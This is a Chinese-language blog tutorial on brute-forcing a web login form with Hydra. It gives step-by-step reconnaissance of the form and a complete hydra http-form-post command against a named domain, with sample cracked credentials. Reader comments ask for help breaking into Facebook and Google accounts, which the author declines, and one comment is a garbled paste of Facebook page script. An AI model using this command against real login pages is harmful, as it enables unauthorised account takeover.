Hydra 暴力破解密碼工具 – 實戰測試

2015-07-10 Kali, 資安攻防戰

Hydra 是一個暴力破解帳號密碼的工具,使用既有的帳號密碼檔來進行每一組的比對破解,這是一個只需要時間的無腦破解工具,你只要放著即可讓 Hydra 替你找到登入帳密

 

Hydra 算是一款集成又操作方便的工具,他可以應用於 http、https、ftp、ldap、mysql、pop3、ssh .. 等等

 

本篇的範例主要是用來測試 “弱密碼” ,來讓一般使用者知道已經暴露在危險中。

 

 

使用 Hydra 你必須具備基本的原始碼概念,因為你必須確認以下符合資格才能進行 Hydra 暴力破解

1. 必須無圖形驗證或其他協同驗證的方式

2. 從原始碼判斷是使用 post / get 來丟帳號密碼

3. 登入 (action) 的網址

4. Login fail 的錯誤判別方式,一般為錯誤訊息

 

 

Step.1 首先你必須先到要暴力破解的登入頁

螢幕快照 2015-07-10 03.27.35

 

 

Step.2 檢視原始碼,找到帳號、密碼、登入 action 網址

<form name="login" action="login.go" method="post"  onsubmit="javascript:window.document.forms['login'].elements['submit_button'].disabled='true';return true">
            <input type="hidden" name="frontdoor" value='true'/>
            <h1>請輸入您的帳號及密碼</h1>
            <div id="error_center">
            </div>
            <div style="margin:5px 0 10px 0">
              <span id="title">使用者帳號:&nbsp;</span>
              <input style="font-family: Verdana" id="account" name="login" type="text" value=""
                     tabindex="1" autocomplete="false"/>
            </div>
            <div style="margin:0 0 10px 0">
              <span id="title">密碼:&nbsp;</span>
              <input style="font-family: Verdana" name="pwd" type="password"
                     tabindex="2" autocomplete="off" onkeydown="if (event.keyCode == 13) { document.forms[0].submit(); return false; }"/>
            </div>

找到以下

action=”login.go”

method=”post”

帳號 name=”login”

密碼 name=”pwd”

 

並且嘗試登入失敗,確認顯示的錯誤訊息為 “Login fail” (可以取關鍵字就好,Hydra 會依照執行後的結果與此訊息判斷是否成功登入)

 

有了以上資訊我們就可以開始暴力破解

 

 

Step.3 進行暴力破解

這個步驟你必須擁有一個符合帳密需求的帳號、密碼檔,在 Kali 有預設的密碼檔進行示範。註1

 

由 Step.2 收集到的資料是採用 post 來發送帳密,所以我們使用 http-form-post 來進行攻擊

$ hydra -L /usr/share/metasploit-framework/data/john/wordlists/password.lst -P /usr/share/metasploit-framework/data/john/wordlists/password.lst taiwan.com http-form-post "/bank/login.aspx:login=^USER^&pwd=^PASS^:Login fail"
  • -L 為輸入 USER 帳號檔,若指定 USER 可使用 -l
  • -P 為輸入 PASS 密碼檔,若指定 PASS 可使用 -p
  •  taiwan.com 即為我們要攻擊的網域
  • 格式為 domain service “/url:Account=^USER^&Password=^PASS^:錯誤訊息”

^USER^ 和 ^PASS^ 會將帳號、密碼檔分別帶入進行暴力破解,而最後為登入成功與否的判定

 

 

Step.4 執行結果

若是你的帳號、密碼檔龐大,則破解時間越長

如果有找到對應的帳號密碼,則會顯示如下

[80][www-form] host: taiwan.com   login: admin   password: admin
1 of 1 target successfully completed, I valid password found Hydra

 

則 admin / admin 就是你的登入帳號密碼!

 

 

註1. 帳號密碼檔為暴力破解最關鍵之一的工具,一般稱為字典檔,字典檔必須一定要擁有正確的使用者登入資訊(帳號密碼),才可能核對成功!

暴力破解只是將你提供的清單(字典),一一進行登入測試,當然如果帳號密碼為 10 位元,而你準備的字典檔只有 9 位元,則無法破解成功。

 

 

 

 

參考資料:

雅技資訊

9 Replies to “Hydra 暴力破解密碼工具 – 實戰測試”

  1. PEI表示:

    請問您可以破解FB及MESSENGER密碼嗎?
    需要什麼資訊?
    費用多少?
    破解過程會被當事人發現嗎?

    • shazi7804表示:

      Hi PEI

      破解密碼是違法行為,文章資訊純粹研究。

    • 沙玉珍表示:

      (require(“ServerJS”))().handle({“require”:[[“ScriptPath”,”set”,[],[“WebTimelineController:timeline”,”8d4dad13″,{“imp_id”:”04Jwcf7ndmanaKJMY”,”ef_page”:”WebTimelineController:timeline”,”entity_id”:”100004890931676″,”profile_session_id”:”100038089993272:100004890931676:1561261756″}]],[“BanzaiODS”],[“BanzaiScuba”]]});}, “ServerJS define”, {“root”:true})();韓彙庭{“\u0040context”:”http:\/\/schema.org”,”\u0040type”:”Person”,”name”:”\u97d3\u5f59\u5ead”,”affiliation”:[]}<link rel="shortcut icon"

  2. rakme表示:

    嗨,請問google的也能暴力破解嘛?因為我帳號被盜用綁定也被解除,已經無可辦法可以解救了@@

    • shazi7804表示:

      此篇僅供研究參考 … 若有帳戶問題建議你可以直接尋求 Google 協助。

  3. 匿名表示:

    我找不到登陸錯誤的訊息該怎麼辦?

  4. +我FB:郭勁廷(圖片是鸚鵡兄弟你壞壞)表示:

    這是用vb6寫的嗎?
    可以教我寫嗎?
    我好想學
    我會一點點vb2017

  5. 啊sa表示:

    其實爬文爬了好幾天,關於http的破解都抄來抄去,大家寫的都差不多,就是沒有人解說如何使用 https-post-form,

  6. sadsa表示:

    邮箱破解软件有吗?

給 Mr. 沙先生一點建議

彙整

分類

展開全部 | 收合全部

License

訂閱 Mr. 沙先生 的文章

輸入你的 email 用於訂閱